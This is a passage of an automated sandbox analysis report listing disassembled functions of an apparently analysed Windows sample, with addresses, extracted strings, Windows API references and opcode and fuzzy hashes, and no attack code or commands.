Instruction Fuzzy Hash: A5F0BB3A609134AAEB125F669C00F8FB7989B82774B164111E81DE7AA4DB70D40586F1

Non-executed Functions

Function 00615570 Relevance: 9.0, Strings: 7, Instructions: 235COMMON

Download Yara Rule

Strings

CN, xrefs: 0061562A
Lw, xrefs: 00615632
SRQ, xrefs: 0061558F
8, xrefs: 00615753
}~, xrefs: 0061563A
_], xrefs: 00615587
5[Y, xrefs: 00615716

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
API String ID: 0-3274379026
Opcode ID: 2ef088fb791fcb4b5d07652d7079772ea40ef3d6f1599daa881505971eba02cf
Instruction ID: 08a301f3285fa546200b8b3706abc013c32a2f12c98195f1db6cd06405054162
Opcode Fuzzy Hash: 2ef088fb791fcb4b5d07652d7079772ea40ef3d6f1599daa881505971eba02cf
Instruction Fuzzy Hash: 135111765193918BD324CF25C8912ABB7F3EFD2311F58895CE8C28B394EB749906C782

Function 00630A70 Relevance: 8.1, Strings: 6, Instructions: 621COMMON

Download Yara Rule

Strings

IK, xrefs: 00630DE2
=3, xrefs: 00630B9D
Lgfe, xrefs: 00630C52
C, xrefs: 00630B26
\, xrefs: 00630B31
E!q#, xrefs: 00630B13, 00630B1D, 006310E7

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID: =3$C$E!q#$Lgfe$\$IK
API String ID: 0-2973044635
Opcode ID: 0c6124da53620af7279f1ed181df6a4729dfee9d6376ee642a2278ed5423e1b3
Instruction ID: 0741fa52ee2710997bdc7651d422b64ba5d382a3222259e41ecdbd776c9f484b
Opcode Fuzzy Hash: 0c6124da53620af7279f1ed181df6a4729dfee9d6376ee642a2278ed5423e1b3
Instruction Fuzzy Hash: D9223171A083019FE324CF24C845BABBBA6EF85714F148A2CF9959B381D775D909CB92

Function 6CD973AA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CD973B6
IsDebuggerPresent.KERNEL32 ref: 6CD97482
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CD974A2
UnhandledExceptionFilter.KERNEL32(?), ref: 6CD974AC

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b64d750f67b2bc940f6ae21dbfbcaf553ecf5a766ce32d8c19fd9c368fc48505
Instruction ID: ef3067f6be14a29722964efb25c7d31b60c462ef27c38e7318674b6e4d957418
Opcode Fuzzy Hash: b64d750f67b2bc940f6ae21dbfbcaf553ecf5a766ce32d8c19fd9c368fc48505
Instruction Fuzzy Hash: C8314B79D05218DBDF10DFA1D9897CDBBB8BF08304F10419AE40CAB250EB709A84CF54

Function 006182B0 Relevance: 5.9, Strings: 4, Instructions: 861COMMON

Download Yara Rule

Strings

BBSH, xrefs: 006186D0
GZE^, xrefs: 006186BC
=79, xrefs: 0061866E
+2/?, xrefs: 00618659

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID: +2/?$=79$BBSH$GZE^
API String ID: 0-3392023846
Opcode ID: 00fe1e064dcaa1da413347bfb472ac20779eab0912f43db2572b41facf3bac7f
Instruction ID: afc998383fee7a0123d305c78175881f8af823ef962f160c928b54bb666a3a24
Opcode Fuzzy Hash: 00fe1e064dcaa1da413347bfb472ac20779eab0912f43db2572b41facf3bac7f
Instruction Fuzzy Hash: 89521370504B418FC735CF39C8906A6BBE2BF56314F188A6DD4E68BB92CB35E846CB51

Function 6CD99D3A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CD99E32
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CD99E3C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CD99E49

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c9478162a562efd58aa724ea6c4e7ef5de05a3f1f293789845f271e9a6107c1c
Instruction ID: a297636f8c5debc204f7b775e1c8dcfa5e338db9f4b3cd78f98e785ce2aaf40c
Opcode Fuzzy Hash: c9478162a562efd58aa724ea6c4e7ef5de05a3f1f293789845f271e9a6107c1c
Instruction Fuzzy Hash: 4031D67491122CEBCB61DF65D9887CDBBB8BF08314F5042DAE51CA7260E7709B858F54

Function 6CD98B35 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6CD98B34,?,00000001,?,?), ref: 6CD98B57
TerminateProcess.KERNEL32(00000000,?,6CD98B34,?,00000001,?,?), ref: 6CD98B5E
ExitProcess.KERNEL32 ref: 6CD98B70

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 9bc7ef3aba0cbf5574cf91b0ed60dfa2d0e06a468aa9d7cdad8e399834caef43
Instruction ID: 64852dc0432c6d5630ad667cbf7cba394cb7f5bf4a02269bc1b24772615a31a6
Opcode Fuzzy Hash: 9bc7ef3aba0cbf5574cf91b0ed60dfa2d0e06a468aa9d7cdad8e399834caef43
Instruction Fuzzy Hash: 69E08C39100688EFCF016F91CD08E9D3B3DFB42A5AF044415FA0A86630CB39D982EB94

Function 0061D8D0 Relevance: 3.9, Strings: 3, Instructions: 112COMMON

Download Yara Rule

Strings

@J, xrefs: 0061D931
VD, xrefs: 0061D923
KP, xrefs: 0061D92A

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID: @J$KP$VD
API String ID: 0-3841663987
Opcode ID: 9fa3d2b87a46f13b78e19f520b388da73002b2cea1f4d3e4d46194a187be3b61
Instruction ID: 8f837bb072964bd88a050895500f161e08737c8515995c66ca2732e22dc24a02
Opcode Fuzzy Hash: 9fa3d2b87a46f13b78e19f520b388da73002b2cea1f4d3e4d46194a187be3b61
Instruction Fuzzy Hash: EF3135B5904716AFD714CF29C881BAEFB72FB82314F588228D4256BB84C374A466CFD5

Function 6CD96370 Relevance: 3.0, Strings: 2, Instructions: 537COMMONLIBRARYCODE

Download Yara Rule

Strings

/cc, xrefs: 6CD968B2
/cc, xrefs: 6CD96B2F

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID:
String ID: /cc$/cc
API String ID: 0-1050529368
Opcode ID: 987da9d23fc150a67a53f72be21abe7cf30956df5ee96a9078fb4eff75aa5efa
Instruction ID: be4c78ddceb9b64871e12aab42b9848f3c629f27a95ae6cd809b347cd0344b1b
Opcode Fuzzy Hash: 987da9d23fc150a67a53f72be21abe7cf30956df5ee96a9078fb4eff75aa5efa
Instruction Fuzzy Hash: 5D12D039B441098FCB44CFBCD5906DDBBF2EB4A318F10C115E865EB7A8D62AD8068F95

Function 6CD92790 Relevance: 3.0, Strings: 2, Instructions: 481COMMON

Download Yara Rule

Strings

u5Ws, xrefs: 6CD92B45
-b) , xrefs: 6CD927B6

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID:
String ID: -b) $u5Ws
API String ID: 0-738638561
Opcode ID: 50ac6a3c4a4a86fc6bdfbd8e0ecb289fc3a2eeef33a76e7d4a43a30e94e25bec
Instruction ID: 2439798cde423d28bcd3cb4b09e0f2d4873b90bd8f1cf5730995a704e4900ab3
Opcode Fuzzy Hash: 50ac6a3c4a4a86fc6bdfbd8e0ecb289fc3a2eeef33a76e7d4a43a30e94e25bec
Instruction Fuzzy Hash: BA125C79E45209CFDB14CFACC588A9DBBF5FB4A308F20411AE469EBB65C635A805CF41

Function 6CDA03C1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDA03BC,?,?,00000008,?,?,6CDA0054,00000000), ref: 6CDA05EE

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 69592285e1c7e2b1443b3a57c3a800b283d23025aafc61ce3c87387c6c1d92ce
Instruction ID: cac881801a1fb5ede36928fafe38d13c5f104728600ac3acbb52e9ad4de6f60c
Opcode Fuzzy Hash: 69592285e1c7e2b1443b3a57c3a800b283d23025aafc61ce3c87387c6c1d92ce
Instruction Fuzzy Hash: 47B14831611648CFDB05CF68C486B957BA0FF453A8F258658E8EACF6B1C335E992CB40

Function 6CD97578 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CD9758E

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 7b05d317cee7cde3cc68f5092bb8c0531d2fd28d439d76b2544094da22b7b5a2
Instruction ID: 3d31bf6cc4981e0f9598b4bcfcc659e156caa9083fe6102645c0b293b8bb1792
Opcode Fuzzy Hash: 7b05d317cee7cde3cc68f5092bb8c0531d2fd28d439d76b2544094da22b7b5a2
Instruction Fuzzy Hash: 5851DCB5B01215EFEB04CFA9D9917AEBBF4FB09318F22852AC521EB650D3749940CF90

Function 00633720 Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

5|iL, xrefs: 00633910

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID: 5|iL
API String ID: 0-1880071150
Opcode ID: 119d9b564c58e3664755373a27b7c1bd2dcc34c2ad9583fe8ec6af8b9e8f19ec
Instruction ID: a3c41aca2572ecbb84f0b56ea5f557cea8274eaffd188e1bda431daec28a2e47
Opcode Fuzzy Hash: 119d9b564c58e3664755373a27b7c1bd2dcc34c2ad9583fe8ec6af8b9e8f19ec
Instruction Fuzzy Hash: B071F936A053208BC7149F398C8069BB7A7EBC6724F158A6CD9E4A7390D771DD0287C5

Function 6CD9B91C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6CD9B91C

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: ca4aec982a2a4b2d2f33e14bca3c9d57d466865a64e6e5f3ae2d359e413b357d
Instruction ID: 9701f252095eede9270ec973f657899e13f57950b7d9a7c0d243923dfb636ca5
Opcode Fuzzy Hash: ca4aec982a2a4b2d2f33e14bca3c9d57d466865a64e6e5f3ae2d359e413b357d
Instruction Fuzzy Hash: E6A01130B00202CBAB008E38AA8820C3ABCAA0A2A230A002AAA00C0000EA208080AA00

Function 006301F0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba1380cb9152e7cdc994e456a920f27018b5a696dcda6c5b24acc876655b729
Instruction ID: 9820790c21417e2d62dd67bb3f712248c4bd2c42390f60fb291fa3791d0fe75e
Opcode Fuzzy Hash: 5ba1380cb9152e7cdc994e456a920f27018b5a696dcda6c5b24acc876655b729
Instruction Fuzzy Hash: 07B10972E086918FEB11CA7CC8943997FA25B97220F1D82D5D9A59B3DAC135480AC7A1

Function 006175A0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c440fd392f191b6e8895623acec7e7899405cf54a5bc7bded58fbc5a49b1d70
Instruction ID: 72a1f79e74caebefc62bd8a40c4a9c3973a4f42a40d359900aa8e0b35eafee29
Opcode Fuzzy Hash: 3c440fd392f191b6e8895623acec7e7899405cf54a5bc7bded58fbc5a49b1d70
Instruction Fuzzy Hash: CA912E72A086614FC725CD28C85039ABAE2ABD5324F1DC27DE8A99B3D2D674DC46D3C1

Function 00629F20 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea3c089c40a90612af5fa77227c880fd5697afeefe9195d09533c97548e9e871
Instruction ID: 8252d623cb90423c21b5d6be48fff897a217f5ae9128c33bbcfa51bc726b4ea7
Opcode Fuzzy Hash: ea3c089c40a90612af5fa77227c880fd5697afeefe9195d09533c97548e9e871
Instruction Fuzzy Hash: 3A814F37A08DA14BCB188E7CAC512F97B935F97330F2D83A9D8719B3D5C2658C069762

Function 0062BC10 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a65835262f39d49afecb2dcdbc79a73b42f7af50d8c3cc9d06bfaccb0e10de
Instruction ID: bc576a371fec7143c57f8428747861dbcab2dc36129228f38725c30463b42f22
Opcode Fuzzy Hash: c5a65835262f39d49afecb2dcdbc79a73b42f7af50d8c3cc9d06bfaccb0e10de
Instruction Fuzzy Hash: 31712737B15DB147871C8D3C5C122E9AB939BD233072ED37A9DB5DB3E0CA298D024680

Function 00633320 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914d959bc7e6c9efb39b9576444eff4f150a526f5f3cca680094477f89f3e344
Instruction ID: 9c7a29d8279a4fff94db5d3fcd4b92b86f87c5d360c11adfd172cb00c3496833
Opcode Fuzzy Hash: 914d959bc7e6c9efb39b9576444eff4f150a526f5f3cca680094477f89f3e344
Instruction Fuzzy Hash: 4F513836A083608BD7219F289C4066BB7E3EBD6724F29C67CD8956B351E731DD0287C5

Function 00618090 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 630998247854d0bde64274e99dbb902cb22c51f1debc744137b24f1c1796da0b
Instruction ID: f63cf5a0b0a0f9cf20584a694c9274c1131093004377bbb59ceda94832e3bc01
Opcode Fuzzy Hash: 630998247854d0bde64274e99dbb902cb22c51f1debc744137b24f1c1796da0b
Instruction Fuzzy Hash: 96511337A199D19FD7254E3C4C022E96A531BE7370B3E43AADCB09B3D1CA668D434390

Function 6CD93470 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e1bbf0c01800f87f18f9aa7c653b174653a5627e0dd4fdf758ae893ca71f130
Instruction ID: bfa4ef7f8d033f6323489f659cc3e8bf24359274f9f82dba731f17451fb45470
Opcode Fuzzy Hash: 7e1bbf0c01800f87f18f9aa7c653b174653a5627e0dd4fdf758ae893ca71f130
Instruction Fuzzy Hash: 50510076F102058FCF04CFBCC9916DEBBF2AB4A324F144219E929E77A4C73999058B15

Function 6CD99D09 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction ID: c18f100c84ef3e70b37ffd2c1680ffa43ffa7057396a3614913fd13cd2d6dbab
Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction Fuzzy Hash: 45E08632912128EBC710CBC8C5409CAB3ECE745A45F110496F505D3520C270DE00C7D0

Function 006332A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37c34810d76ac32ed1e3c693d6fe2006ff27c0c8d8d7da8e10277fe1322ecdb
Instruction ID: 34fde4c13fcfd63171c7d53dbec0e996951c7845071132db72e9b575714ea7da
Opcode Fuzzy Hash: e37c34810d76ac32ed1e3c693d6fe2006ff27c0c8d8d7da8e10277fe1322ecdb
Instruction Fuzzy Hash: 90B01254B142087F0064AE0E8C45D7BF7FED2CB650F107018B408A3314C650EC0482FD

Function 6CD9C6F8 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6CD9C73C

Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E644
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E656
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E668
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E67A
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E68C
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E69E
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6B0
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6C2
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6D4
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6E6
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6F8
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E70A
Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E71C

_free.LIBCMT ref: 6CD9C731

Part of subcall function 6CD9A013: HeapFree.KERNEL32(00000000,00000000,?,6CD9924C), ref: 6CD9A029
Part of subcall function 6CD9A013: GetLastError.KERNEL32(?,?,6CD9924C), ref: 6CD9A03B

_free.LIBCMT ref: 6CD9C753
_free.LIBCMT ref: 6CD9C768
_free.LIBCMT ref: 6CD9C773
_free.LIBCMT ref: 6CD9C795
_free.LIBCMT ref: 6CD9C7A8
_free.LIBCMT ref: 6CD9C7B6
_free.LIBCMT ref: 6CD9C7C1
_free.LIBCMT ref: 6CD9C7F9
_free.LIBCMT ref: 6CD9C800
_free.LIBCMT ref: 6CD9C81D
_free.LIBCMT ref: 6CD9C835

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b19d64e817f1f92d8885cc9d67c743be971c621272890a1c77e64e1c7893f405
Instruction ID: ae45764f92bf788ac055a1f6609593acc3c22ee4657512fa5ebb2d0f660549b8
